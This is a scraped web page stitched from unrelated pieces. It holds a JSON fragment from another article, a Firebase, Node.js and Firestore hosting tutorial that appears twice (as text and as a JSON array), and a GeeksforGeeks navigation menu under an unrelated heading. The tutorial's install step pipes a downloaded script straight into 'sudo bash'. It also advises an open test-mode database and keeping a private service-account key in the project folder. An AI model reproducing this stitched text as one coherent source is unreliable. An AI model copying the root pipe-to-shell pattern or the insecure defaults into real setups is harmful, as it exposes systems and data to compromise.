couple of new layers on top considering your particular natural language processing task, and train. The results will be much more successful than a model you build from scratch." }, { "code": null, "e": 10937, "s": 10803, "text": "If you would like to have access to full code on Google Colab, and have access to my latest content, subscribe to the mailing list:✉️" }, { "code": null, "e": 10950, "s": 10937, "text": "Subsribe Now" } ]
Host a dynamic website on Google Firebase using Node.js and Cloud Firestore DB | by Tushar Chand Kapoor | Towards Data Science
Tushar Kapoor: (https://www.tusharck.com/) Demo Git URL: https://github.com/tusharck/firebase-demo Firebase is a comprehensive app platform built on Google’s infrastructure, therefore it provides a secure, fast, free (paid options also available for additional resources) and easy way to host your content on the web or mobile applications. It gives free Custom domain & SSL (SSL provides a standard security layer for https connections.Cloud Firestore: A flexible and scalable database for realtime data sync across client apps.Other Features: Cloud Functions, Cloud Messaging (FCM), Crashlytics, Dynamic Links, Hosting, ML Kit, Storage, Performance Monitoring, Predictions and Test Lab (The functionality and resources of these products can be increased by buying a paid plan, but the free tier services are very good. To look at the plans check Firebase Pricing).Automatic scaling of resources. It gives free Custom domain & SSL (SSL provides a standard security layer for https connections. Cloud Firestore: A flexible and scalable database for realtime data sync across client apps. Other Features: Cloud Functions, Cloud Messaging (FCM), Crashlytics, Dynamic Links, Hosting, ML Kit, Storage, Performance Monitoring, Predictions and Test Lab (The functionality and resources of these products can be increased by buying a paid plan, but the free tier services are very good. To look at the plans check Firebase Pricing). Automatic scaling of resources. 1. Google AccountIf you don’t have a Google account, you need to sign up for one. You can do so by going to https://accounts.google.com/SignUp. 2. Node.js and npm Mac/WindowsYou can download the installer from https://nodejs.org/en/download/. Linux Follow the steps below to install Node.js: 1. Open a terminal 2. Run the following commands: sudo apt-get install curlcurl -sL https://deb.nodesource.com/setup_13.x | sudo bash -sudo apt install nodejs Note: I have used setup_13.x because at the time of the tutorial latest version was 13 you can check the latest release by going to https://nodejs.org/en/. To check if Node.js and npm are successfully installed run the following commands, which will output the version installed: node -vnpm -v 3. Firebase-CLI (Command-Line Interface)These are the tools for managing, viewing, and deploying the Firebase projects. npm install -g firebase-tools Go to https://firebase.google.com and Sign In from the top right corner.Click on Go to console, from the top right corner.Then click on Create project, as shown below. Go to https://firebase.google.com and Sign In from the top right corner. Click on Go to console, from the top right corner. Then click on Create project, as shown below. 4. The next thing is to enter the name of your project, and press continue. 5. Press continue to enable Google Analytics for your Firebase project (if you don’t want it then check to disable). 6. Select the nearest location for Google Analytics. 7. Click on Create Project, and wait for it load. Then you will see something like below. Open a command-line/terminal then create and go to a new directory. Open a command-line/terminal then create and go to a new directory. mkdir my-firebase-projectcd my-firebase-project 2. To host a website on Firebase login into firebase using the following command. After you run the command a browser window will open asking you to log in to firebase using your Google credentials. Enter the credentials there and Firebase will sign into your system. firebase login Now we have to initialize the project that we created on the Firebase console into the system. For doing run the command below. Now we have to initialize the project that we created on the Firebase console into the system. For doing run the command below. firebase init 2. Press down key then select two things by pressing the space bar key. Functions Hosting Then press Enter to continue. 3. Then select Use an existing project then press enter. 4. Press enter on the my-firebase-project or the project name you used. 5. Select Javascript and press enter. 6. You can say No to Do you want to use ESLint to catch probable bugs and enforce style? 7. Type Yes for installing the dependencies with npm. 8. Here we have to do two tasks: You have to select the directory in which your website and assets will reside. By default it is pubic you can press enter to continue or you can change to your desired directory name. Types Yes for the single-app page so that your dynamic URLs can be redirected to their proper destination. 9. Test the firebase app on your local system by running the following command. Then go to http://localhost:5000 to see your basic website running. firebase serve --only hosting,functions You should see something like this below after opening the http://localhost:5000 URL. 10. Close server from the terminal. Here we will switch inside the functions directory to do so use. Here we will switch inside the functions directory to do so use. cd functions 2. Install ExpressIt is a minimal and flexible Node.js web application framework. npm i express --save 3. Install Handle BarsIt is a templating engine for Node.js used for the dynamic front end of the website. npm i handlebars --save 4. Install consolidate npm i consolidate --save 5. Create a folder named views inside functions folder in which we will store all the frontend code. mkdir views 6. Switch back to the main directory by running the following command: cd .. Go to https://console.firebase.google.com/ .Select your project.Select Database from the pane on the left Go to https://console.firebase.google.com/ . Select your project. Select Database from the pane on the left 4. Click on Create Database 5. Select Start in test mode because otherwise you will not able to access the database from your system. We will change this setting once we are done with the development of the website.Then click Next after doing so. 6. Select the location of your Firestore DB.Note: After you set this location, you cannot change it later. Click on start collection. Click on start collection. 2. Enter the Collection ID, you can sample for now. 3. Enter the sample data. Enter sample_doc as the Document ID. Enter Heading inside the Field. I like Cloud inside the Value. Then click Save. We will split the portion into two parts, in the first part, we will see how to fetch the data from Firestore and use in the website. In the second portion, we will see how to submit the form data. First, we will download the credentials to access Firestore Go to https://console.firebase.google.com/ . Go to https://console.firebase.google.com/ . 2. Click on settings from the left pane and go to Project settings. 3. Go to Service accounts and click on Generate new private key. 4. Click on Generate Key, It will give a pop up to download the key. Store the key inside your functions folder of your website. Open index.js inside the functions folder. Open index.js inside the functions folder. 2. We need to define some of the libraries that we want to use in our application. These are the same libraries that we installed earlier. const functions = require('firebase-functions');const express = require('express');const engines = require('consolidate');var hbs = require('handlebars');const admin = require('firebase-admin'); 3. Here we set a few things: Initialize the app using express. We will set our engine as handlebars. Then we will tell the express that our front end code is going to be inside the views folder. const app = express();app.engine('hbs',engines.handlebars);app.set('views','./views');app.set('view engine','hbs'); 4. Authorize your application to access your Firestore DB.Note: 1. Change YOUR_SDK_NAME.json with the file you downloaded for credentials to access Firestore.2. Change the database URL to your database URL. To see the URL you can to Settings > Service Account. var serviceAccount = require("./YOUR_SDK_NAME.json");admin.initializeApp({credential: admin.credential.cert(serviceAccount),databaseURL: "https://myfirebaseproject-bx54dasx3.firebaseio.com"}); 5. Function to fetch data from Firestore. Collection ID is sample. Document ID is sample_doc. We defined the above while entering the sample data. async function getFirestore(){const firestore_con = await admin.firestore();const writeResult = firestore_con.collection('sample').doc('sample_doc').get().then(doc => {if (!doc.exists) { console.log('No such document!'); }else {return doc.data();}}).catch(err => { console.log('Error getting document', err);});return writeResult} Note: We use async because we have to wait for the promise operation to be completed between the Database and our website. 6. Create the route and send the result to the front end. app.get('/',async (request,response) =>{var db_result = await getFirestore();response.render('index',{db_result});});exports.app = functions.https.onRequest(app); 7. Create index.hbs inside the views folder.Note: .hbs is a handelbars file 8. Write this basic HTML code inside index.hbs to see the fetched result. <html> <body> <h1>{{db_result.Heading}}</h1> </body></html> Note: {{db_result.Heading}} , db_result is the variable that was passed from the backend. .Heading is the Field inside the document that we defined while entering the data in the Firestore DB. 9. Open firebase.json and change “destination”: “/index.html” to "function":"app". 10. Delete index.html inside the public folder, deleting this is very important. If you don’t delete this it will always pick this file and our backend code will be useless. 11. Test the firebase app on your local system by running the following command. Then go to http://localhost:5000 to see your basic website running. firebase serve --only hosting,functions 12. Close the server from the terminal. Here we will insert data from our website into Firestore. 1. Create Another Collection named form_data, in which we will insert the form data. Note: It will ask you to enter a document as well to create the collection to enter any sample value. 2. Go to http://localhost:5000 after running the command below to test on your local server. firebase serve --only hosting,functions 3. Add the HTML code to make a sample form inside index.hbs. <html> <body><h1>{{db_result.Heading}}</h1><form action="/insert_data" method="post" > <fieldset> <legend>Sample Form</legend> First name:<br> <input type="text" name="firstname" > <br> Last name:<br> <input type="text" name="lastname"> <br><br> <input type="submit" value="Submit"> </fieldset> </form> </body></html> action=”/insert_data” is the path that we will define inside our function. After refreshing the page it should like as in the image shown below. 3. Inside index.js add the code which inserts data into Firestore. async function insertFormData(request){const writeResult = await admin.firestore().collection('form_data').add({firstname: request.body.firstname,lastname: request.body.lastname}).then(function() {console.log("Document successfully written!");}).catch(function(error) {console.error("Error writing document: ", error);});} 4. Inside index.js define the route to which the HTML form will send a post request. app.post('/insert_data',async (request,response) =>{var insert = await insertFormData(request);response.sendStatus(200);}); 6. Insert some sample data inside the form to test it. 7. After pressing submit you should see the response as OK displayed on the webpage. 8. Go to https://console.firebase.google.com/ then to the Database section. You should see the inserted form data. We need to change some piece of code which we used for authentication as when you deploy it online Firebase takes care of authentication. We need to change some piece of code which we used for authentication as when you deploy it online Firebase takes care of authentication. Inside index.js remove the following code: var serviceAccount = require("./YOUR_SDK_NAME.json");admin.initializeApp({credential: admin.credential.cert(serviceAccount),databaseURL: "https://myfirebaseproject-bx54dasx3.firebaseio.com"}); Instead inside index.js, insert this into your code: admin.initializeApp(functions.config().firebase); Here we are telling Firebase to take authentication information from config that exists when you deploy. 2. On the terminal inside your website directory, run the following command: firebase deploy It will take a few minutes, but after it, you should see something like this: 3. Go to the Hosting URL provided by firebase as shown in the image above. Congrats You are done with hosting a dynamic website on Firebase. Buy a domain from any provider like GoDaddy or any other as you feel.Go to Hosting from the pane on left.Click on Connect Domain. Buy a domain from any provider like GoDaddy or any other as you feel. Go to Hosting from the pane on left. Click on Connect Domain. 4. Enter the domain Here: 5. Follow the verification instructions. Disclaimer: Terms of Service for Firebase ServicesFirebase and its services are a product of Google, nowhere in this article suggests otherwise.This article is meant for education purposes. Terms of Service for Firebase Services Firebase and its services are a product of Google, nowhere in this article suggests otherwise. This article is meant for education purposes.
[ { "code": null, "e": 214, "s": 171, "text": "Tushar Kapoor: (https://www.tusharck.com/)" }, { "code": null, "e": 270, "s": 214, "text": "Demo Git URL: https://github.com/tusharck/firebase-demo" }, { "code": null, "e": 512, "s": 270, "text": "Firebase is a comprehensive app platform built on Google’s infrastructure, therefore it provides a secure, fast, free (paid options also available for additional resources) and easy way to host your content on the web or mobile applications." }, { "code": null, "e": 1069, "s": 512, "text": "It gives free Custom domain & SSL (SSL provides a standard security layer for https connections.Cloud Firestore: A flexible and scalable database for realtime data sync across client apps.Other Features: Cloud Functions, Cloud Messaging (FCM), Crashlytics, Dynamic Links, Hosting, ML Kit, Storage, Performance Monitoring, Predictions and Test Lab (The functionality and resources of these products can be increased by buying a paid plan, but the free tier services are very good. To look at the plans check Firebase Pricing).Automatic scaling of resources." }, { "code": null, "e": 1166, "s": 1069, "text": "It gives free Custom domain & SSL (SSL provides a standard security layer for https connections." }, { "code": null, "e": 1259, "s": 1166, "text": "Cloud Firestore: A flexible and scalable database for realtime data sync across client apps." }, { "code": null, "e": 1597, "s": 1259, "text": "Other Features: Cloud Functions, Cloud Messaging (FCM), Crashlytics, Dynamic Links, Hosting, ML Kit, Storage, Performance Monitoring, Predictions and Test Lab (The functionality and resources of these products can be increased by buying a paid plan, but the free tier services are very good. To look at the plans check Firebase Pricing)." }, { "code": null, "e": 1629, "s": 1597, "text": "Automatic scaling of resources." }, { "code": null, "e": 1773, "s": 1629, "text": "1. Google AccountIf you don’t have a Google account, you need to sign up for one. You can do so by going to https://accounts.google.com/SignUp." }, { "code": null, "e": 1792, "s": 1773, "text": "2. Node.js and npm" }, { "code": null, "e": 1872, "s": 1792, "text": "Mac/WindowsYou can download the installer from https://nodejs.org/en/download/." }, { "code": null, "e": 1971, "s": 1872, "text": "Linux Follow the steps below to install Node.js: 1. Open a terminal 2. Run the following commands:" }, { "code": null, "e": 2080, "s": 1971, "text": "sudo apt-get install curlcurl -sL https://deb.nodesource.com/setup_13.x | sudo bash -sudo apt install nodejs" }, { "code": null, "e": 2236, "s": 2080, "text": "Note: I have used setup_13.x because at the time of the tutorial latest version was 13 you can check the latest release by going to https://nodejs.org/en/." }, { "code": null, "e": 2360, "s": 2236, "text": "To check if Node.js and npm are successfully installed run the following commands, which will output the version installed:" }, { "code": null, "e": 2374, "s": 2360, "text": "node -vnpm -v" }, { "code": null, "e": 2494, "s": 2374, "text": "3. Firebase-CLI (Command-Line Interface)These are the tools for managing, viewing, and deploying the Firebase projects." }, { "code": null, "e": 2524, "s": 2494, "text": "npm install -g firebase-tools" }, { "code": null, "e": 2692, "s": 2524, "text": "Go to https://firebase.google.com and Sign In from the top right corner.Click on Go to console, from the top right corner.Then click on Create project, as shown below." }, { "code": null, "e": 2765, "s": 2692, "text": "Go to https://firebase.google.com and Sign In from the top right corner." }, { "code": null, "e": 2816, "s": 2765, "text": "Click on Go to console, from the top right corner." }, { "code": null, "e": 2862, "s": 2816, "text": "Then click on Create project, as shown below." }, { "code": null, "e": 2938, "s": 2862, "text": "4. The next thing is to enter the name of your project, and press continue." }, { "code": null, "e": 3055, "s": 2938, "text": "5. Press continue to enable Google Analytics for your Firebase project (if you don’t want it then check to disable)." }, { "code": null, "e": 3108, "s": 3055, "text": "6. Select the nearest location for Google Analytics." }, { "code": null, "e": 3198, "s": 3108, "text": "7. Click on Create Project, and wait for it load. Then you will see something like below." }, { "code": null, "e": 3266, "s": 3198, "text": "Open a command-line/terminal then create and go to a new directory." }, { "code": null, "e": 3334, "s": 3266, "text": "Open a command-line/terminal then create and go to a new directory." }, { "code": null, "e": 3382, "s": 3334, "text": "mkdir my-firebase-projectcd my-firebase-project" }, { "code": null, "e": 3650, "s": 3382, "text": "2. To host a website on Firebase login into firebase using the following command. After you run the command a browser window will open asking you to log in to firebase using your Google credentials. Enter the credentials there and Firebase will sign into your system." }, { "code": null, "e": 3665, "s": 3650, "text": "firebase login" }, { "code": null, "e": 3793, "s": 3665, "text": "Now we have to initialize the project that we created on the Firebase console into the system. For doing run the command below." }, { "code": null, "e": 3921, "s": 3793, "text": "Now we have to initialize the project that we created on the Firebase console into the system. For doing run the command below." }, { "code": null, "e": 3935, "s": 3921, "text": "firebase init" }, { "code": null, "e": 4007, "s": 3935, "text": "2. Press down key then select two things by pressing the space bar key." }, { "code": null, "e": 4017, "s": 4007, "text": "Functions" }, { "code": null, "e": 4025, "s": 4017, "text": "Hosting" }, { "code": null, "e": 4055, "s": 4025, "text": "Then press Enter to continue." }, { "code": null, "e": 4112, "s": 4055, "text": "3. Then select Use an existing project then press enter." }, { "code": null, "e": 4184, "s": 4112, "text": "4. Press enter on the my-firebase-project or the project name you used." }, { "code": null, "e": 4222, "s": 4184, "text": "5. Select Javascript and press enter." }, { "code": null, "e": 4311, "s": 4222, "text": "6. You can say No to Do you want to use ESLint to catch probable bugs and enforce style?" }, { "code": null, "e": 4365, "s": 4311, "text": "7. Type Yes for installing the dependencies with npm." }, { "code": null, "e": 4398, "s": 4365, "text": "8. Here we have to do two tasks:" }, { "code": null, "e": 4582, "s": 4398, "text": "You have to select the directory in which your website and assets will reside. By default it is pubic you can press enter to continue or you can change to your desired directory name." }, { "code": null, "e": 4689, "s": 4582, "text": "Types Yes for the single-app page so that your dynamic URLs can be redirected to their proper destination." }, { "code": null, "e": 4837, "s": 4689, "text": "9. Test the firebase app on your local system by running the following command. Then go to http://localhost:5000 to see your basic website running." }, { "code": null, "e": 4877, "s": 4837, "text": "firebase serve --only hosting,functions" }, { "code": null, "e": 4963, "s": 4877, "text": "You should see something like this below after opening the http://localhost:5000 URL." }, { "code": null, "e": 4999, "s": 4963, "text": "10. Close server from the terminal." }, { "code": null, "e": 5064, "s": 4999, "text": "Here we will switch inside the functions directory to do so use." }, { "code": null, "e": 5129, "s": 5064, "text": "Here we will switch inside the functions directory to do so use." }, { "code": null, "e": 5142, "s": 5129, "text": "cd functions" }, { "code": null, "e": 5224, "s": 5142, "text": "2. Install ExpressIt is a minimal and flexible Node.js web application framework." }, { "code": null, "e": 5245, "s": 5224, "text": "npm i express --save" }, { "code": null, "e": 5352, "s": 5245, "text": "3. Install Handle BarsIt is a templating engine for Node.js used for the dynamic front end of the website." }, { "code": null, "e": 5376, "s": 5352, "text": "npm i handlebars --save" }, { "code": null, "e": 5399, "s": 5376, "text": "4. Install consolidate" }, { "code": null, "e": 5424, "s": 5399, "text": "npm i consolidate --save" }, { "code": null, "e": 5525, "s": 5424, "text": "5. Create a folder named views inside functions folder in which we will store all the frontend code." }, { "code": null, "e": 5537, "s": 5525, "text": "mkdir views" }, { "code": null, "e": 5608, "s": 5537, "text": "6. Switch back to the main directory by running the following command:" }, { "code": null, "e": 5614, "s": 5608, "text": "cd .." }, { "code": null, "e": 5720, "s": 5614, "text": "Go to https://console.firebase.google.com/ .Select your project.Select Database from the pane on the left" }, { "code": null, "e": 5765, "s": 5720, "text": "Go to https://console.firebase.google.com/ ." }, { "code": null, "e": 5786, "s": 5765, "text": "Select your project." }, { "code": null, "e": 5828, "s": 5786, "text": "Select Database from the pane on the left" }, { "code": null, "e": 5856, "s": 5828, "text": "4. Click on Create Database" }, { "code": null, "e": 6075, "s": 5856, "text": "5. Select Start in test mode because otherwise you will not able to access the database from your system. We will change this setting once we are done with the development of the website.Then click Next after doing so." }, { "code": null, "e": 6182, "s": 6075, "text": "6. Select the location of your Firestore DB.Note: After you set this location, you cannot change it later." }, { "code": null, "e": 6209, "s": 6182, "text": "Click on start collection." }, { "code": null, "e": 6236, "s": 6209, "text": "Click on start collection." }, { "code": null, "e": 6288, "s": 6236, "text": "2. Enter the Collection ID, you can sample for now." }, { "code": null, "e": 6431, "s": 6288, "text": "3. Enter the sample data. Enter sample_doc as the Document ID. Enter Heading inside the Field. I like Cloud inside the Value. Then click Save." }, { "code": null, "e": 6629, "s": 6431, "text": "We will split the portion into two parts, in the first part, we will see how to fetch the data from Firestore and use in the website. In the second portion, we will see how to submit the form data." }, { "code": null, "e": 6689, "s": 6629, "text": "First, we will download the credentials to access Firestore" }, { "code": null, "e": 6734, "s": 6689, "text": "Go to https://console.firebase.google.com/ ." }, { "code": null, "e": 6779, "s": 6734, "text": "Go to https://console.firebase.google.com/ ." }, { "code": null, "e": 6847, "s": 6779, "text": "2. Click on settings from the left pane and go to Project settings." }, { "code": null, "e": 6912, "s": 6847, "text": "3. Go to Service accounts and click on Generate new private key." }, { "code": null, "e": 7041, "s": 6912, "text": "4. Click on Generate Key, It will give a pop up to download the key. Store the key inside your functions folder of your website." }, { "code": null, "e": 7084, "s": 7041, "text": "Open index.js inside the functions folder." }, { "code": null, "e": 7127, "s": 7084, "text": "Open index.js inside the functions folder." }, { "code": null, "e": 7266, "s": 7127, "text": "2. We need to define some of the libraries that we want to use in our application. These are the same libraries that we installed earlier." }, { "code": null, "e": 7461, "s": 7266, "text": "const functions = require('firebase-functions');const express = require('express');const engines = require('consolidate');var hbs = require('handlebars');const admin = require('firebase-admin');" }, { "code": null, "e": 7490, "s": 7461, "text": "3. Here we set a few things:" }, { "code": null, "e": 7524, "s": 7490, "text": "Initialize the app using express." }, { "code": null, "e": 7562, "s": 7524, "text": "We will set our engine as handlebars." }, { "code": null, "e": 7656, "s": 7562, "text": "Then we will tell the express that our front end code is going to be inside the views folder." }, { "code": null, "e": 7772, "s": 7656, "text": "const app = express();app.engine('hbs',engines.handlebars);app.set('views','./views');app.set('view engine','hbs');" }, { "code": null, "e": 8033, "s": 7772, "text": "4. Authorize your application to access your Firestore DB.Note: 1. Change YOUR_SDK_NAME.json with the file you downloaded for credentials to access Firestore.2. Change the database URL to your database URL. To see the URL you can to Settings > Service Account." }, { "code": null, "e": 8226, "s": 8033, "text": "var serviceAccount = require(\"./YOUR_SDK_NAME.json\");admin.initializeApp({credential: admin.credential.cert(serviceAccount),databaseURL: \"https://myfirebaseproject-bx54dasx3.firebaseio.com\"});" }, { "code": null, "e": 8268, "s": 8226, "text": "5. Function to fetch data from Firestore." }, { "code": null, "e": 8293, "s": 8268, "text": "Collection ID is sample." }, { "code": null, "e": 8320, "s": 8293, "text": "Document ID is sample_doc." }, { "code": null, "e": 8373, "s": 8320, "text": "We defined the above while entering the sample data." }, { "code": null, "e": 8705, "s": 8373, "text": "async function getFirestore(){const firestore_con = await admin.firestore();const writeResult = firestore_con.collection('sample').doc('sample_doc').get().then(doc => {if (!doc.exists) { console.log('No such document!'); }else {return doc.data();}}).catch(err => { console.log('Error getting document', err);});return writeResult}" }, { "code": null, "e": 8828, "s": 8705, "text": "Note: We use async because we have to wait for the promise operation to be completed between the Database and our website." }, { "code": null, "e": 8886, "s": 8828, "text": "6. Create the route and send the result to the front end." }, { "code": null, "e": 9049, "s": 8886, "text": "app.get('/',async (request,response) =>{var db_result = await getFirestore();response.render('index',{db_result});});exports.app = functions.https.onRequest(app);" }, { "code": null, "e": 9125, "s": 9049, "text": "7. Create index.hbs inside the views folder.Note: .hbs is a handelbars file" }, { "code": null, "e": 9199, "s": 9125, "text": "8. Write this basic HTML code inside index.hbs to see the fetched result." }, { "code": null, "e": 9270, "s": 9199, "text": "<html> <body> <h1>{{db_result.Heading}}</h1> </body></html>" }, { "code": null, "e": 9463, "s": 9270, "text": "Note: {{db_result.Heading}} , db_result is the variable that was passed from the backend. .Heading is the Field inside the document that we defined while entering the data in the Firestore DB." }, { "code": null, "e": 9546, "s": 9463, "text": "9. Open firebase.json and change “destination”: “/index.html” to \"function\":\"app\"." }, { "code": null, "e": 9720, "s": 9546, "text": "10. Delete index.html inside the public folder, deleting this is very important. If you don’t delete this it will always pick this file and our backend code will be useless." }, { "code": null, "e": 9869, "s": 9720, "text": "11. Test the firebase app on your local system by running the following command. Then go to http://localhost:5000 to see your basic website running." }, { "code": null, "e": 9909, "s": 9869, "text": "firebase serve --only hosting,functions" }, { "code": null, "e": 9949, "s": 9909, "text": "12. Close the server from the terminal." }, { "code": null, "e": 10007, "s": 9949, "text": "Here we will insert data from our website into Firestore." }, { "code": null, "e": 10092, "s": 10007, "text": "1. Create Another Collection named form_data, in which we will insert the form data." }, { "code": null, "e": 10194, "s": 10092, "text": "Note: It will ask you to enter a document as well to create the collection to enter any sample value." }, { "code": null, "e": 10287, "s": 10194, "text": "2. Go to http://localhost:5000 after running the command below to test on your local server." }, { "code": null, "e": 10327, "s": 10287, "text": "firebase serve --only hosting,functions" }, { "code": null, "e": 10388, "s": 10327, "text": "3. Add the HTML code to make a sample form inside index.hbs." }, { "code": null, "e": 10782, "s": 10388, "text": "<html> <body><h1>{{db_result.Heading}}</h1><form action=\"/insert_data\" method=\"post\" > <fieldset> <legend>Sample Form</legend> First name:<br> <input type=\"text\" name=\"firstname\" > <br> Last name:<br> <input type=\"text\" name=\"lastname\"> <br><br> <input type=\"submit\" value=\"Submit\"> </fieldset> </form> </body></html>" }, { "code": null, "e": 10857, "s": 10782, "text": "action=”/insert_data” is the path that we will define inside our function." }, { "code": null, "e": 10927, "s": 10857, "text": "After refreshing the page it should like as in the image shown below." }, { "code": null, "e": 10994, "s": 10927, "text": "3. Inside index.js add the code which inserts data into Firestore." }, { "code": null, "e": 11317, "s": 10994, "text": "async function insertFormData(request){const writeResult = await admin.firestore().collection('form_data').add({firstname: request.body.firstname,lastname: request.body.lastname}).then(function() {console.log(\"Document successfully written!\");}).catch(function(error) {console.error(\"Error writing document: \", error);});}" }, { "code": null, "e": 11402, "s": 11317, "text": "4. Inside index.js define the route to which the HTML form will send a post request." }, { "code": null, "e": 11526, "s": 11402, "text": "app.post('/insert_data',async (request,response) =>{var insert = await insertFormData(request);response.sendStatus(200);});" }, { "code": null, "e": 11581, "s": 11526, "text": "6. Insert some sample data inside the form to test it." }, { "code": null, "e": 11666, "s": 11581, "text": "7. After pressing submit you should see the response as OK displayed on the webpage." }, { "code": null, "e": 11781, "s": 11666, "text": "8. Go to https://console.firebase.google.com/ then to the Database section. You should see the inserted form data." }, { "code": null, "e": 11919, "s": 11781, "text": "We need to change some piece of code which we used for authentication as when you deploy it online Firebase takes care of authentication." }, { "code": null, "e": 12057, "s": 11919, "text": "We need to change some piece of code which we used for authentication as when you deploy it online Firebase takes care of authentication." }, { "code": null, "e": 12100, "s": 12057, "text": "Inside index.js remove the following code:" }, { "code": null, "e": 12293, "s": 12100, "text": "var serviceAccount = require(\"./YOUR_SDK_NAME.json\");admin.initializeApp({credential: admin.credential.cert(serviceAccount),databaseURL: \"https://myfirebaseproject-bx54dasx3.firebaseio.com\"});" }, { "code": null, "e": 12346, "s": 12293, "text": "Instead inside index.js, insert this into your code:" }, { "code": null, "e": 12396, "s": 12346, "text": "admin.initializeApp(functions.config().firebase);" }, { "code": null, "e": 12501, "s": 12396, "text": "Here we are telling Firebase to take authentication information from config that exists when you deploy." }, { "code": null, "e": 12578, "s": 12501, "text": "2. On the terminal inside your website directory, run the following command:" }, { "code": null, "e": 12594, "s": 12578, "text": "firebase deploy" }, { "code": null, "e": 12672, "s": 12594, "text": "It will take a few minutes, but after it, you should see something like this:" }, { "code": null, "e": 12747, "s": 12672, "text": "3. Go to the Hosting URL provided by firebase as shown in the image above." }, { "code": null, "e": 12813, "s": 12747, "text": "Congrats You are done with hosting a dynamic website on Firebase." }, { "code": null, "e": 12943, "s": 12813, "text": "Buy a domain from any provider like GoDaddy or any other as you feel.Go to Hosting from the pane on left.Click on Connect Domain." }, { "code": null, "e": 13013, "s": 12943, "text": "Buy a domain from any provider like GoDaddy or any other as you feel." }, { "code": null, "e": 13050, "s": 13013, "text": "Go to Hosting from the pane on left." }, { "code": null, "e": 13075, "s": 13050, "text": "Click on Connect Domain." }, { "code": null, "e": 13101, "s": 13075, "text": "4. Enter the domain Here:" }, { "code": null, "e": 13142, "s": 13101, "text": "5. Follow the verification instructions." }, { "code": null, "e": 13154, "s": 13142, "text": "Disclaimer:" }, { "code": null, "e": 13332, "s": 13154, "text": "Terms of Service for Firebase ServicesFirebase and its services are a product of Google, nowhere in this article suggests otherwise.This article is meant for education purposes." }, { "code": null, "e": 13371, "s": 13332, "text": "Terms of Service for Firebase Services" }, { "code": null, "e": 13466, "s": 13371, "text": "Firebase and its services are a product of Google, nowhere in this article suggests otherwise." } ]
Two Dimensional Segment Tree | Sub-Matrix Sum - GeeksforGeeks
CoursesFor Working ProfessionalsLIVEDSA Live ClassesSystem DesignJava Backend DevelopmentFull Stack LIVEExplore MoreSelf-PacedDSA- Self PacedSDE TheoryMust-Do Coding QuestionsExplore MoreFor StudentsLIVECompetitive ProgrammingData Structures with C++Data ScienceExplore MoreSelf-PacedDSA- Self PacedCIPJAVA / Python / C++Explore MoreSchool CoursesSchool GuidePython ProgrammingLearn To Make AppsExplore moreAll Courses For Working ProfessionalsLIVEDSA Live ClassesSystem DesignJava Backend DevelopmentFull Stack LIVEExplore MoreSelf-PacedDSA- Self PacedSDE TheoryMust-Do Coding QuestionsExplore More LIVEDSA Live ClassesSystem DesignJava Backend DevelopmentFull Stack LIVEExplore More DSA Live Classes System Design Java Backend Development Full Stack LIVE Explore More Self-PacedDSA- Self PacedSDE TheoryMust-Do Coding QuestionsExplore More DSA- Self Paced SDE Theory Must-Do Coding Questions Explore More For StudentsLIVECompetitive ProgrammingData Structures with C++Data ScienceExplore MoreSelf-PacedDSA- Self PacedCIPJAVA / Python / C++Explore More LIVECompetitive ProgrammingData Structures with C++Data ScienceExplore More Competitive Programming Data Structures with C++ Data Science Explore More Self-PacedDSA- Self PacedCIPJAVA / Python / C++Explore More DSA- Self Paced CIP JAVA / Python / C++ Explore More School CoursesSchool GuidePython ProgrammingLearn To Make AppsExplore more School Guide Python Programming Learn To Make Apps Explore more All Courses TutorialsAlgorithmsAnalysis of AlgorithmsAsymptotic AnalysisWorst, Average and Best CasesAsymptotic NotationsLittle o and little omega notationsLower and Upper Bound TheoryAnalysis of LoopsSolving RecurrencesAmortized AnalysisWhat does 'Space Complexity' mean ?Pseudo-polynomial AlgorithmsPolynomial Time Approximation SchemeA Time Complexity QuestionSearching AlgorithmsSorting AlgorithmsGraph AlgorithmsPattern SearchingGeometric AlgorithmsMathematicalBitwise AlgorithmsRandomized AlgorithmsGreedy AlgorithmsDynamic ProgrammingDivide and ConquerBacktrackingBranch and BoundAll AlgorithmsData StructuresArraysLinked ListStackQueueBinary TreeBinary Search TreeHeapHashingGraphAdvanced Data StructureMatrixStringsAll Data StructuresInterview CornerCompany PreparationTop TopicsPractice Company QuestionsInterview ExperiencesExperienced InterviewsInternship InterviewsCompetititve ProgrammingDesign PatternsSystem Design TutorialMultiple Choice QuizzesLanguagesCC++JavaPythonC#JavaScriptjQuerySQLPHPScalaPerlGo LanguageHTMLCSSKotlinML & Data ScienceMachine LearningData ScienceCS SubjectsMathematicsOperating SystemDBMSComputer NetworksComputer Organization and ArchitectureTheory of ComputationCompiler DesignDigital LogicSoftware EngineeringGATEGATE Computer Science NotesLast Minute NotesGATE CS Solved PapersGATE CS Original Papers and Official KeysGATE 2021 DatesGATE CS 2021 SyllabusImportant Topics for GATE CSWeb TechnologiesHTMLCSSJavaScriptAngularJSReactJSNodeJSBootstrapjQueryPHPSoftware DesignsSoftware Design PatternsSystem Design TutorialSchool LearningSchool ProgrammingMathematicsNumber SystemAlgebraTrigonometryStatisticsProbabilityGeometryMensurationCalculusMaths Notes (Class 8-12)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 NotesClass 12 NotesNCERT SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths SolutionRD Sharma SolutionsClass 8 Maths SolutionClass 9 Maths SolutionClass 10 Maths SolutionClass 11 Maths SolutionClass 12 Maths SolutionPhysics Notes (Class 8-11)Class 8 NotesClass 9 NotesClass 10 NotesClass 11 NotesCS Exams/PSUsISROISRO CS Original Papers and Official KeysISRO CS Solved PapersISRO CS Syllabus for Scientist/Engineer ExamUGC NETUGC NET CS Notes Paper IIUGC NET CS Notes Paper IIIUGC NET CS Solved PapersStudentCampus Ambassador ProgramSchool Ambassador ProgramProjectGeek of the MonthCampus Geek of the MonthPlacement CourseCompetititve ProgrammingTestimonialsStudent ChapterGeek on the TopInternshipCareers AlgorithmsAnalysis of AlgorithmsAsymptotic AnalysisWorst, Average and Best CasesAsymptotic NotationsLittle o and little omega notationsLower and Upper Bound TheoryAnalysis of LoopsSolving RecurrencesAmortized AnalysisWhat does 'Space Complexity' mean ?Pseudo-polynomial AlgorithmsPolynomial Time Approximation SchemeA Time Complexity QuestionSearching AlgorithmsSorting AlgorithmsGraph AlgorithmsPattern SearchingGeometric AlgorithmsMathematicalBitwise AlgorithmsRandomized AlgorithmsGreedy AlgorithmsDynamic ProgrammingDivide and ConquerBacktrackingBranch and BoundAll Algorithms Analysis of AlgorithmsAsymptotic AnalysisWorst, Average and Best 